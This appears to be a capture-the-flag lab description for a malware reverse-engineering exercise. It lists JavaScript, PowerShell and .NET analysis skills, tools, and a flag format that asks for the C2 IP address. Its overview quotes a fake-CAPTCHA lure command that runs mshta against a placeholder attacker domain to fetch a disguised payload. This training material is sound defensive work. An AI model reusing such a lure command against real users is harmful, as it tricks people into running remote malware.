MalMusic

HardMalware Reverse Engineering

Overview

One user reported that he was hacked by running this command in the Run command box: mshta https://[attacker_domain]/panda-eyes-colorblind.mp3 # UID: 887610 – I am not a robot – Verify CAPTCHA sequence

Flag format:

flag{(c2_ip_address)}

Lab Details

Prerequisites & Requirements

  • Intermediate JavaScript Proficiency: A solid understanding of JavaScript syntax, common obfuscation techniques, and the ability to debug and modify scripts for analysis.
  • Intermediate PowerShell Expertise: Familiarity with PowerShell scripting, including command execution, variable manipulation, and understanding typical obfuscation methods used in PowerShell payloads.
  • Intermediate .NET C# Knowledge: A good grasp of C# programming concepts, the .NET framework, and experience with decompilers to analyze compiled .NET executables.

What will you learn?

  • Deobfuscate Multi-Stage JavaScript Payloads: Master techniques for deobfuscating complex JavaScript code, including hex decoding, character code transformations, and identifying execution chains.
  • Reverse Engineer Obfuscated PowerShell Scripts: Gain proficiency in analyzing and deobfuscating PowerShell scripts that utilize various techniques such as custom functions, array manipulations, and cryptographic operations ( e.g ., AES, Gzip).
  • Perform Dynamic .NET Malware Analysis: Develop skills in dynamically analyzing .NET executables using tools like dnSpy, including setting breakpoints, stepping through code, and extracting critical runtime information like C2 addresses.

Tools

  • A JavaScript Engine ( e.g ., Node.js ): For executing and debugging JavaScript code extracted from initial stages of the malware.
  • PowerShell: To execute and deobfuscate intermediate PowerShell scripts.
  • CyberChef: A versatile web-based tool for various data transformations, including Base64 decoding and hex conversions.

Job Positions

Malware Analyst

Tags

DecompilerStatic AnalysisDynamic AnalysisObfuscationC2 Communication